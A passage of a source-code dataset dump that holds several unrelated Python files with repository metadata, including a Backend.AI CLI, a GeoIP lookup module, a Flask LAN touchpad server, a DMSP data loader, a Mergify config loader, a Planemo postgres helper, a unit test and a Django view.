| 37.509804 | 142 | 0.652901 | 300 | 1,913 | 4.163333 | 0.453333 | 0.048038 | 0.014412 | 0.019215 | 0.280224 | 0.228983 | 0.192154 | 0.16253 | 0.16253 | 0.155324 | 0 | 0.081327 | 0.19655 | 1,913 | 50 | 143 | 38.26 | 0.731295 | 0.386827 | 0 | 0.214286 | 0 | 0 | 0.247405 | 0 | 0 | 0 | 0 | 0 | 0.178571 | 1 | 0.071429 | false | 0 | 0.142857 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ed740f84eb596b331c579907df179ccc0238174 | 1,414 | py | Python | src/ai/backend/client/cli/main.py | youngjun0627/backend.ai-client-py | be7c174ab73e112fdb8be61e6affc20fc72f7d59 | [
"MIT"
] | 7 | 2019-01-18T08:08:42.000Z | 2022-02-10T00:36:24.000Z | src/ai/backend/client/cli/main.py | youngjun0627/backend.ai-client-py | be7c174ab73e112fdb8be61e6affc20fc72f7d59 | [
"MIT"
] | 179 | 2017-09-07T04:54:44.000Z | 2022-03-29T11:30:47.000Z | src/ai/backend/client/cli/main.py | youngjun0627/backend.ai-client-py | be7c174ab73e112fdb8be61e6affc20fc72f7d59 | [
"MIT"
] | 13 | 2017-09-08T05:37:44.000Z | 2021-09-14T23:35:31.000Z | import warnings
import click
from ai.backend.cli.extensions import ExtendedCommandGroup
from ai.backend.client import __version__
from ai.backend.client.output import get_output_handler
from ai.backend.client.config import APIConfig, set_config
from ai.backend.client.cli.types import CLIContext, OutputMode
# Root click command group for the Backend.AI CLI; subcommands are attached
# elsewhere via the ExtendedCommandGroup class.
@click.group(
    cls=ExtendedCommandGroup,
    context_settings={
        'help_option_names': ['-h', '--help'],
    },
)
@click.option('--skip-sslcert-validation',
              help='Skip SSL certificate validation for all API requests.',
              is_flag=True)
@click.option('--output', type=click.Choice(['json', 'console']), default='console',
              help='Set the output style of the command results.')
@click.version_option(version=__version__)
@click.pass_context
def main(ctx: click.Context, skip_sslcert_validation: bool, output: str) -> None:
    """
    Backend.AI command line interface.
    """
    # Imported lazily so the announcement machinery only loads when the CLI
    # actually starts up.
    from .announcement import announce
    config = APIConfig(
        skip_sslcert_validation=skip_sslcert_validation,
        announcement_handler=announce,
    )
    # Register the config globally for the client library.
    set_config(config)
    output_mode = OutputMode(output)
    cli_ctx = CLIContext(
        api_config=config,
        output_mode=output_mode,
    )
    cli_ctx.output = get_output_handler(cli_ctx, output_mode)
    # Stash the CLI context on click's context object for subcommands.
    ctx.obj = cli_ctx
    from .pretty import show_warning
    # Route Python warnings through the CLI's pretty-printer.
    warnings.showwarning = show_warning
| 30.73913 | 84 | 0.712871 | 171 | 1,414 | 5.672515 | 0.391813 | 0.030928 | 0.06701 | 0.078351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.185997 | 1,414 | 45 | 85 | 31.422222 | 0.842745 | 0.024045 | 0 | 0 | 0 | 0 | 0.126833 | 0.018328 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0.027778 | 0.25 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eda6227d1c508e3c3dc40e3141ee055d68cff84 | 4,849 | py | Python | src/main/python/cybercaptain/processing/country.py | FHNW-CyberCaptain/CyberCaptain | 07c989190e997353fbf57eb7a386947d6ab8ffd5 | [
"MIT"
] | 1 | 2018-10-01T10:59:55.000Z | 2018-10-01T10:59:55.000Z | src/main/python/cybercaptain/processing/country.py | FHNW-CyberCaptain/CyberCaptain | 07c989190e997353fbf57eb7a386947d6ab8ffd5 | [
"MIT"
] | null | null | null | src/main/python/cybercaptain/processing/country.py | FHNW-CyberCaptain/CyberCaptain | 07c989190e997353fbf57eb7a386947d6ab8ffd5 | [
"MIT"
] | 1 | 2021-11-01T00:09:00.000Z | 2021-11-01T00:09:00.000Z | """
The country module contains the processing_country class.
"""
from os import path
import geoip2.database
from cybercaptain.utils.exceptions import ValidationError
from cybercaptain.processing.base import processing_base
from cybercaptain.utils.jsonFileHandler import json_file_reader, json_file_writer
class processing_country(processing_base):
    """
    The country class allows to map a given IP to an ISO 3166-1 alpha-2 country code and add it to the datasets.
    Please provide a MaxMind GeoLite2-Country DB (.mmdb) yourself via the maxMindDbPath attribute.
    Important: This module will NOT work with a City, Anonymous, ASN, Connection-Type, ... MaxMind database! Only country supported!

    **Parameters**:
        kwargs :
            contains a dictionary of all attributes.

    **Script Attributes**:
        ipInputAttribute:
            a str to where the IP attribute can be found in the given source dataset (dot-separated path).
        outputAttribute:
            a str to where (& which key) output the ISO 3166-1 alpha-2 country code (must be a top-level key).
        maxMindDbPath:
            a str to where the maxmind GeoIP database (.mmdb) is located.
    """
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.validate(kwargs)

        # If subclass needs special variables define here
        self.ip_input_attribute = kwargs.get("ipInputAttribute")  # dotted path to the IP field
        self.output_attribute = kwargs.get("outputAttribute")     # top-level key for the country code
        self.max_mind_db_path = kwargs.get("maxMindDbPath")       # path to the GeoLite2-Country .mmdb

    def run(self):
        """
        Runs the country-lookup algorithm: reads JSON records from self.src,
        annotates each with a country code, and writes them to self.target.

        **Returns**:
            ``True`` if this run succeeded.
            ``False`` if this run did not succeed.
        """
        self.cc_log("INFO", "Data Processing Country: Started")

        self.cc_log("DEBUG", "Trying to open the MaxMind GeoLite2-Country DB, please wait!")
        try:
            db = geoip2.database.Reader(self.max_mind_db_path)
        except Exception as e:
            self.logger.exception(e)
            self.cc_log("ERROR", "Failed to open the MaxMind GeoLite2-Country DB at %s - please check the file!" % (self.max_mind_db_path))
            return False
        self.cc_log("DEBUG", "Opened the MaxMindGeoLite2-Country DB!")

        json_fr = json_file_reader(self.src)
        json_fw = json_file_writer(self.target)

        self.cc_log("INFO", "Started to lookup ips and write into the target, please wait!")
        while not json_fr.isEOF():
            data = json_fr.readRecord()

            # "-99" is the sentinel written when no country can be resolved.
            country_code = "-99"

            # Walk the dotted attribute path down into the record.
            found_ip = data
            for attribute in self.ip_input_attribute.split('.'):
                found_ip = found_ip[attribute]

            # found_ip == data means the path never descended into the record.
            if not found_ip or found_ip == data:
                self.cc_log("WARNING", "No IP found at the give ipInputAttribute place - Add country code -99 to this dataset!")
            else:
                # Lookup ip for country
                try:
                    ip_info = db.country(found_ip)
                    if ip_info.country.iso_code: country_code = ip_info.country.iso_code
                    self.cc_log("DEBUG", "Found country code %s for ip %s" % (ip_info.country.iso_code, found_ip))
                except Exception as e:
                    # Lookup failure keeps the "-99" sentinel.
                    self.cc_log("WARNING", "No country code found for ip %s - add -99 to country code" % (found_ip))

            data[self.output_attribute] = country_code
            json_fw.writeRecord(data)

        json_fr.close()
        json_fw.close()
        db.close()

        self.cc_log("INFO", "Data Processing Country: Finished")
        return True

    def validate(self, kwargs):
        """
        Validates all arguments for the country module.

        kwargs(dict): contains a dictionary of all attributes.

        Raises ValidationError when a required attribute is missing or invalid.
        """
        super().validate(kwargs)
        self.cc_log("INFO", "Data Processing Country: started validation")
        if not kwargs.get("ipInputAttribute"): raise ValidationError(self, ["ipInputAttribute"], "Parameter cannot be empty!")
        if not kwargs.get("outputAttribute"): raise ValidationError(self, ["outputAttribute"] , "Parameters cannot be empty!")
        if "." in kwargs.get("outputAttribute"): raise ValidationError(self, ["outputAttribute"] , "Parameters outputAttribute can not be a nested attribute - please configure a toplevel key!")
        if not kwargs.get("maxMindDbPath"): raise ValidationError(self, ["maxMindDbPath"] , "Parameters cannot be empty!")
        if ".mmdb" not in kwargs.get("maxMindDbPath"): raise ValidationError(self, ["maxMindDbPath"] , "Please only configure MaxMind-DBs for the path (.mmdb)!")
        if not path.isfile(kwargs.get("maxMindDbPath")): raise ValidationError(self, ["maxMindDbPath"] , "Please configure an existing path to an existing MaxMind-DB!")
        self.cc_log("INFO", "Data Processing Country: finished validation")
8ede460bd8fcc02049fe028261dea40e63202e0a | 1,411 | py | Python | contents/2020_ITinerary/assets/session_1/car.py | EunSeong-Park/ITinerary | 7e33613e3382f3e4b4404ad6795bc28823c7641d | [
"MIT"
] | 4 | 2020-03-31T01:18:43.000Z | 2020-11-21T16:53:02.000Z | contents/2020_ITinerary/assets/session_1/car.py | EunSeong-Park/ITinerary | 7e33613e3382f3e4b4404ad6795bc28823c7641d | [
"MIT"
] | null | null | null | contents/2020_ITinerary/assets/session_1/car.py | EunSeong-Park/ITinerary | 7e33613e3382f3e4b4404ad6795bc28823c7641d | [
"MIT"
] | null | null | null | # skeleton
class Car:
    """A simple car with fuel tracking and driving distance."""

    def __init__(self, name, mileage, max_fuel):
        self.name = name            # display name of the car
        self.mileage = mileage      # km driven per litre of fuel
        self.max_fuel = max_fuel    # tank capacity in litres
        self.fuel = self.max_fuel   # start with a full tank
        self.dist = 0               # total distance driven in km

    def status(self):
        ''' Show the current status of the car
        it should be called after brrr() and gas_station()

        <<< Template >>>
        Car name: [car name]
        Mileage: [mileage]km/L
        Fuel: [Current fuel]L / [Max fuel]L
        Distance: [Total Distance]km

        if fuel < 20 %, print this:
        "WARNING: remaining fuel is too low"
        '''
        print("Car name: " + self.name)
        print("Mileage: " + str(self.mileage) + "km/L")
        print("Fuel: " + str(self.fuel) + "L" + " / " + str(self.max_fuel) + "L")
        print("Distance: " + str(self.dist) + "km")
        # Fix: the low-fuel warning promised by the docstring was missing.
        if self.fuel < 0.2 * self.max_fuel:
            print("WARNING: remaining fuel is too low")

    def brrr(self, km):
        '''
        Drive [km]km. You should implement:
        - distance increases as you drive
        - fuel decreases as you use
        - if the fuel is empty, then you cannot go more
          (+ print, "EMPTY!")
        '''
        fuel_per_km = 1 / self.mileage
        for _ in range(km):
            if self.fuel > fuel_per_km:  # enough fuel for one more km
                self.fuel = self.fuel - fuel_per_km
                self.dist = self.dist + 1
            else:  # tank effectively empty
                # Fix: the "EMPTY!" message promised by the docstring was missing.
                print("EMPTY!")
                break
        self.status()

    def gas_station(self):
        """Refill the tank to capacity and show the updated status."""
        self.fuel = self.max_fuel
        self.status()
# Demo run: drive until the tank would run dry, refuel, and drive again.
benz = Car("Benz", 25, 100)
benz.brrr(10000)
benz.gas_station()
benz.brrr(1000)
benz.gas_station()
| 26.12963 | 81 | 0.582566 | 201 | 1,411 | 4.019901 | 0.333333 | 0.060644 | 0.054455 | 0.037129 | 0.106436 | 0.056931 | 0 | 0 | 0 | 0 | 0 | 0.019704 | 0.280652 | 1,411 | 53 | 82 | 26.622642 | 0.776355 | 0.350106 | 0 | 0.214286 | 0 | 0 | 0.065476 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.178571 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8edeb880bd3ced5f319652f9f1bebc920f8b9270 | 1,855 | py | Python | main.py | webgjc/web-touch-pad | a9270bfde10ffb9dc490a793a1264751c3eed52e | [
"MIT"
] | 10 | 2021-07-01T08:26:56.000Z | 2021-11-05T05:20:29.000Z | main.py | webgjc/web-touch-pad | a9270bfde10ffb9dc490a793a1264751c3eed52e | [
"MIT"
] | null | null | null | main.py | webgjc/web-touch-pad | a9270bfde10ffb9dc490a793a1264751c3eed52e | [
"MIT"
] | 2 | 2021-07-09T09:10:24.000Z | 2021-07-29T05:32:34.000Z | import socket
import pynput
from gevent import pywsgi
from flask_sockets import Sockets
from flask import Flask, request, render_template
from geventwebsocket.handler import WebSocketHandler
# Flask app with websocket support; `mouse` controls the host's pointer.
app = Flask(__name__)
sockets = Sockets(app)
mouse = pynput.mouse.Controller()
@app.route("/", methods=['GET', 'POST'])
def index():
    """Serve the touchpad UI page."""
    return render_template("index.html")
@app.route("/mouse/get/", methods=["GET"])
def getMousePosition():
    """Return the current pointer position as integer pixels."""
    # y, x
    x_pos, y_pos = mouse.position
    return str(int(x_pos)) + "," + str(int(y_pos))
@sockets.route('/mouse/set/')
def setMouse(ws):
    """Websocket endpoint driving pointer moves and scrolls.

    Messages start with an action keyword; the payload after byte 10 is a
    "y,x" coordinate pair. NOTE(review): the fixed offset 10 implies a
    fixed-width header on the client side -- confirm against the JS sender.
    """
    while not ws.closed:
        message = ws.receive()
        if message is not None:
            if message.startswith("move"):
                print("mouse move")
                xy = message[10:].split(",")
                # Payload order is (y, x); pynput expects (x, y).
                mouse.position = (float(xy[1]), float(xy[0]))
            if message.startswith("scroll"):
                print("mouse scroll")
                xy = message[10:].split(",")
                mouse.scroll(float(xy[1]), float(xy[0]))
            # NOTE(review): source indentation was ambiguous; the ack is
            # sent for every non-empty message -- confirm against client.
            ws.send("success")
        else:
            print("no receive")
@app.route("/mouse/click/", methods=["GET"])
def clickMouse():
    """Perform a left or right click based on the ?mouse= query argument."""
    ms = request.args.get("mouse")
    print("mouse click " + ms)
    # Anything other than "left" falls back to a right click.
    button = pynput.mouse.Button.left if ms == "left" else pynput.mouse.Button.right
    mouse.click(button)
    return "success"
def getIp():
    """Return the LAN IP of the outbound interface.

    A UDP "connect" sends no packets; it only selects the interface that
    would route to 8.8.8.8, whose local address we then read.

    Fix: the socket was never closed (resource leak); ensure cleanup.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(("8.8.8.8", 80))
        return s.getsockname()[0]
    finally:
        s.close()
if __name__ == "__main__":
    # app.run("0.0.0.0", "8000", debug=True)
    # gevent WSGI server with websocket support on all interfaces, port 8000.
    server = pywsgi.WSGIServer(("0.0.0.0", 8000), app, handler_class=WebSocketHandler)
    print("server start at")
    print("http://{}:8000".format(getIp()))
    # The two Chinese lines below tell the user to open the URL from another
    # LAN device and rotate that device 90 degrees clockwise to use it as a
    # touchpad for this machine.
    print("请在局域网另一个设备进行访问,可将那个设备作为本设备的触控板")
    print("注意请将设备顺时针旋转90度使用")
    server.serve_forever()
8edf5aa5e27f7a23873c95f6b823d38d6d75b822 | 2,652 | py | Python | dmsp/io.py | space-physics/digital-meridian-spectrometer | 8b46ad53c99a6340f28067fa5c3ee3c877cfcbf2 | [
"Apache-2.0"
] | null | null | null | dmsp/io.py | space-physics/digital-meridian-spectrometer | 8b46ad53c99a6340f28067fa5c3ee3c877cfcbf2 | [
"Apache-2.0"
] | null | null | null | dmsp/io.py | space-physics/digital-meridian-spectrometer | 8b46ad53c99a6340f28067fa5c3ee3c877cfcbf2 | [
"Apache-2.0"
] | null | null | null | from pathlib import Path
from typing import Tuple
from netCDF4 import Dataset
import xarray
import numpy as np
from datetime import datetime, timedelta
from dateutil.parser import parse
def load(
    fn: Path, tlim: Tuple[datetime, datetime] = None, elevlim: Tuple[float, float] = None
) -> xarray.Dataset:
    """
    Load a DMSP spectrometer file into an xarray.Dataset keyed by wavelength.

    This function works with 1983-2010 netCDF3 as well as 2011-present netCDF4 files.

    fn: path to .nc or .pf data file
    tlim: optional (start, end) datetimes (or parseable strings) to subset time
    elevlim: optional (min, max) elevation angles in degrees to subset
    """
    fn = Path(fn).expanduser()
    # %% date from filename -- only way
    ext = fn.suffix.lower()
    if ext == ".nc":
        d0 = datetime.strptime(fn.stem[13:21], "%Y%m%d")
    elif ext == ".pf":
        year = int(fn.stem[4:8])
        days = int(fn.stem[8:11])
        d0 = datetime(year, 1, 1) + timedelta(days=days - 1)
    # NOTE(review): any other extension leaves d0 unbound and raises
    # UnboundLocalError below -- confirm only .nc/.pf files are expected.
    with Dataset(fn, "r") as f:
        # %% load by time
        secdayutc = f["Time"][:]  # seconds since midnight UTC of d0
        # convert to datetimes -- need as ndarray for next line
        t = np.array([d0 + timedelta(seconds=int(s)) for s in secdayutc])
        if tlim is not None and len(tlim) == 2:
            if isinstance(tlim[0], str):
                tlim = [parse(t) for t in tlim]
            tind = (tlim[0] <= t) & (t <= tlim[1])
        else:
            tind = slice(None)
        # %% elevation from North horizon
        """
        elevation is not stored anywhere in the data files...
        """
        elv = np.arange(181.0)
        if elevlim is not None and len(elevlim) == 2:
            elind = (elevlim[0] <= elv) & (elv <= elevlim[1])
        else:
            elind = slice(None)
        # %% wavelength channels
        wavelen = (f["Wavelength"][:] * 10).astype(int)  # stored in nm/10; convert to Angstrom
        goodwl = wavelen > 1  # some channels are unused in some files
        # %% load the data
        # Analog=f['AnalogData'][tind,:]
        # Ibase=f['BaseIntensity'][tind,goodwl,elind]
        Ipeak = f["PeakIntensity"][tind, :, elind]  # time x wavelength x elevation angle
        if Ipeak.shape[1] != wavelen.size:
            wavelen = wavelen[goodwl]
        # %% root out bad channels 2011-03-01 for example
        goodwl &= ~(Ipeak == 0).all(axis=(0, 2))
        wavelen = wavelen[goodwl]
        """
        astype(float) is critical to avoid overflow of int16 dtype!
        """
        Ipeak = f["PeakIntensity"][tind, goodwl, elind].astype(float)
        # %% filter factor per wavelength Rayleigh/PMT * 128
        filtfact = f["FilterFactor"][goodwl]
    # %% assemble output
    R = xarray.Dataset(coords={"time": t[tind], "elevation": elv[elind]})
    for i, w in enumerate(wavelen.astype(str)):
        R[w] = (("time", "elevation"), Ipeak[:, i, :] * filtfact[i].astype(float) / 128.0)
    return R
| 37.352113 | 90 | 0.565988 | 344 | 2,652 | 4.363372 | 0.436047 | 0.011992 | 0.011992 | 0.015989 | 0.019987 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03463 | 0.292232 | 2,652 | 70 | 91 | 37.885714 | 0.765051 | 0.20362 | 0 | 0.088889 | 0 | 0 | 0.047297 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022222 | false | 0 | 0.155556 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ee1d299cf6ec687ec90359acd199e326a83c21f | 1,402 | py | Python | mergify_engine/config.py | bowlofeggs/mergify-engine | 463811a15835c1439fe75e3168113aa497892c77 | [
"Apache-2.0"
] | null | null | null | mergify_engine/config.py | bowlofeggs/mergify-engine | 463811a15835c1439fe75e3168113aa497892c77 | [
"Apache-2.0"
] | null | null | null | mergify_engine/config.py | bowlofeggs/mergify-engine | 463811a15835c1439fe75e3168113aa497892c77 | [
"Apache-2.0"
] | null | null | null | # -*- encoding: utf-8 -*-
#
# Copyright © 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import re
import daiquiri
import yaml
LOG = daiquiri.getLogger(__name__)

# Load settings from the file named by MERGIFYENGINE_SETTINGS (defaults to
# "fake.yml") and promote every top-level key to a module-level attribute.
with open(os.getenv("MERGIFYENGINE_SETTINGS", "fake.yml")) as f:
    CONFIG = yaml.safe_load(f.read())

globals().update(CONFIG)
def log():
    """Log every configuration entry, masking secrets and URL credentials."""
    secret_keys = ("PRIVATE_KEY", "WEBHOOK_SECRET", "OAUTH_CLIENT_ID",
                   "OAUTH_CLIENT_SECRET", "MAIN_TOKEN", "FORK_TOKEN")
    LOG.info("##################### CONFIGURATION ######################")
    for name, value in CONFIG.items():
        if value is not None:
            if name in secret_keys:
                value = "*****"
            if "URL" in name:
                # Strip user:password credentials embedded in URLs.
                value = re.sub(r'://[^@]*@', "://*****@", value)
        LOG.info("* MERGIFYENGINE_%s: %s", name, value)
    LOG.info("##########################################################")
| 31.155556 | 75 | 0.607703 | 183 | 1,402 | 4.579235 | 0.601093 | 0.071599 | 0.031026 | 0.038186 | 0.052506 | 0.052506 | 0 | 0 | 0 | 0 | 0 | 0.008029 | 0.200428 | 1,402 | 44 | 76 | 31.863636 | 0.738626 | 0.411555 | 0 | 0 | 0 | 0 | 0.337454 | 0.15204 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.210526 | 0 | 0.263158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ee3cd2f187e49e671286db1a81ac32e75328dea | 3,740 | py | Python | planemo/database/postgres.py | pvanheus/planemo | 12c4256325bb1b274dcd40d64b91c1f832cf49b1 | [
"CC-BY-3.0"
] | 73 | 2015-01-03T15:09:26.000Z | 2022-03-30T23:52:55.000Z | planemo/database/postgres.py | pvanheus/planemo | 12c4256325bb1b274dcd40d64b91c1f832cf49b1 | [
"CC-BY-3.0"
] | 958 | 2015-01-02T08:27:45.000Z | 2022-03-23T14:51:51.000Z | planemo/database/postgres.py | jmchilton/planemo | d352a085fe10cb6b7c1384663b114201da42d97b | [
"CC-BY-3.0"
] | 84 | 2015-01-06T18:27:28.000Z | 2021-11-18T01:58:17.000Z | """Module describes a :class:`DatabaseSource` for local postgres databases."""
import subprocess
from galaxy.util import unicodify
from planemo.io import communicate
from .interface import DatabaseSource
class ExecutesPostgresSqlMixin:
    """Shared psql-driven helpers for listing, creating, and dropping databases."""

    def list_databases(self):
        """Return database identifiers parsed from `psql --list` output."""
        builder = self._psql_command_builder("--list")
        listing = unicodify(self._communicate(builder))
        # First pipe-separated column of each row is the database name.
        names = [row.split("|")[0].strip() for row in listing.splitlines()]
        return [name for name in names if name]

    def create_database(self, identifier):
        """Use `psql -c "create database"` to create a database."""
        self._run_sql_command("create database %s;" % identifier)

    def delete_database(self, identifier):
        """Use `psql -c "drop database"` to delete a database."""
        self._run_sql_command("drop database %s;" % identifier)

    def _run_sql_command(self, sql):
        # communicate joins command pieces, so the SQL travels as a single
        # argument to psql's --command flag.
        builder = self._psql_command_builder("--command", '%s' % sql)
        self._communicate(builder)

    def _communicate(self, command_builder):
        stdout, _ = communicate(
            command_builder.command,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )
        return stdout
class LocalPostgresDatabaseSource(ExecutesPostgresSqlMixin, DatabaseSource):
    """Local postgres database source managed through psql application."""

    def __init__(self, **kwds):
        """Construct a postgres database source from planemo configuration."""
        self.psql_path = kwds.get("postgres_psql_path", None) or 'psql'
        self.database_user = kwds.get("postgres_database_user", None)
        self.database_host = kwds.get("postgres_database_host", None)
        self.database_port = kwds.get("postgres_database_port", None)
        self._kwds = kwds

    def sqlalchemy_url(self, identifier):
        """Return URL or form postgresql://username:password@localhost/mydatabase."""
        host_part = self.database_host or "localhost"
        if self.database_port:
            host_part += ":%s" % self.database_port
        return "postgresql://%s@%s/%s" % (self.database_user, host_part, identifier)

    def _psql_command_builder(self, *args):
        builder = _CommandBuilder(self.psql_path)
        # Print only tuples so output is easier to parse.
        builder.append_command("--tuples-only")
        # Connection options are appended only when configured.
        for flag, value in (("--username", self.database_user),
                            ("--host", self.database_host),
                            ("--port", self.database_port)):
            if value:
                builder.append_command(flag, value)
        builder.append_command("-P", "pager=off")
        builder.extend_command(args)
        return builder
class _CommandBuilder(object):
def __init__(self, *args):
self.command = list(args)
def append_command(self, *args_or_none):
args_or_none = args_or_none or []
for arg_or_none in args_or_none:
if arg_or_none is not None:
self.command.append(arg_or_none)
def extend_command(self, args):
for arg in (args or []):
self.append_command(arg)
# Public API of this module.
__all__ = (
    "LocalPostgresDatabaseSource",
)
| 34.953271 | 85 | 0.655615 | 433 | 3,740 | 5.420323 | 0.265589 | 0.101406 | 0.034086 | 0.05752 | 0.141457 | 0.141457 | 0.072433 | 0.03579 | 0.03579 | 0 | 0 | 0.000354 | 0.244118 | 3,740 | 106 | 86 | 35.283019 | 0.829855 | 0.164973 | 0 | 0.055556 | 0 | 0 | 0.080415 | 0.036965 | 0 | 0 | 0 | 0 | 0 | 1 | 0.152778 | false | 0 | 0.055556 | 0 | 0.305556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ee5290b246e0f20240930080e650291b2ae9065 | 2,029 | py | Python | tests/test_mdnsCallbackHandler.py | pkeroulas/nmos-common | b650bad276819d794624f4ff6ea08fbdecd915d7 | [
"Apache-2.0"
] | 7 | 2017-12-08T08:05:51.000Z | 2020-10-21T07:32:42.000Z | tests/test_mdnsCallbackHandler.py | pkeroulas/nmos-common | b650bad276819d794624f4ff6ea08fbdecd915d7 | [
"Apache-2.0"
] | 63 | 2017-12-13T08:46:58.000Z | 2020-12-02T08:48:40.000Z | tests/test_mdnsCallbackHandler.py | pkeroulas/nmos-common | b650bad276819d794624f4ff6ea08fbdecd915d7 | [
"Apache-2.0"
] | 7 | 2017-11-22T10:49:23.000Z | 2022-03-15T22:00:17.000Z | #!/usr/bin/env python
# Copyright 2017 British Broadcasting Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from mock import MagicMock
from nmoscommon.mdns.mdnsCallbackHandler import MDNSAdvertisementCallbackHandler
class TestMDNSCallbackHandler(unittest.TestCase):
    """Tests that MDNSAdvertisementCallbackHandler forwards avahi entry
    events to the user callback with the expected payload."""

    def setUp(self):
        self.callback = MagicMock()
        self.name = "testName"
        self.regtype = "_nmos-test._tcp"
        # Fix: was `self.port = 8080,` -- the stray trailing comma made the
        # port a one-element tuple (8080,) instead of an int.
        self.port = 8080
        self.txtRecord = {}
        # Fix: removed a dead `self.dut = MagicMock()` assignment that was
        # immediately overwritten by the real handler below.
        self.dut = MDNSAdvertisementCallbackHandler(
            self.callback,
            self.regtype,
            self.name,
            self.port,
            self.txtRecord
        )

    def build_expected(self, action):
        """Expected callback payload dict for the given action string."""
        return {
            "action": action,
            "name": self.name,
            "regtype": self.regtype,
            "port": self.port,
            "txtRecord": self.txtRecord
        }

    def check_callback_test(self, action):
        # The handler must have invoked the callback with the payload dict
        # as its single positional argument.
        argv, kwargs = self.callback.call_args
        expected = self.build_expected(action)
        actual = argv[0]
        self.assertDictEqual(actual, expected)

    def test_collision(self):
        self.dut.entryCollision()
        self.check_callback_test("collision")

    def test_failed(self):
        self.dut.entryFailed()
        self.check_callback_test("failed")

    def test_established(self):
        self.dut.entryEstablished()
        self.check_callback_test("established")
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
| 28.985714 | 80 | 0.656481 | 231 | 2,029 | 5.662338 | 0.489177 | 0.045872 | 0.051988 | 0.048165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008592 | 0.254312 | 2,029 | 69 | 81 | 29.405797 | 0.855915 | 0.290784 | 0 | 0 | 0 | 0 | 0.061053 | 0 | 0 | 0 | 0 | 0 | 0.02381 | 1 | 0.142857 | false | 0 | 0.071429 | 0.02381 | 0.261905 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ee6449defa3c3d44a2b59e09354dc78f44affea | 882 | py | Python | src/posts/views.py | wmtamit/IceBook-Django | 4625f6ae879c64be9d71d10eca111b837f2fe8bc | [
"MIT"
] | null | null | null | src/posts/views.py | wmtamit/IceBook-Django | 4625f6ae879c64be9d71d10eca111b837f2fe8bc | [
"MIT"
] | null | null | null | src/posts/views.py | wmtamit/IceBook-Django | 4625f6ae879c64be9d71d10eca111b837f2fe8bc | [
"MIT"
from django.shortcuts import render, get_object_or_404
from django.contrib.auth.decorators import login_required

from .models import Post
from .forms import PostForm
@login_required
def add_post_view(request):
    """Create a new post owned by the logged-in user.

    GET renders an empty form; POST validates and saves the uploaded post.
    """
    if request.method == "POST":
        form = PostForm(request.POST, request.FILES)
        if form.is_valid():
            obj = form.save(commit=False)
            obj.user = request.user  # attach the author before saving
            obj.save()
            form = PostForm()  # reset to a blank form after a successful save
        # Fix: an invalid POST now re-renders the bound form so field
        # errors are shown instead of being silently discarded.
    else:
        form = PostForm()
    template_name = "posts/add_post.html"
    context = {
        "form": form
    }
    return render(request, template_name, context)
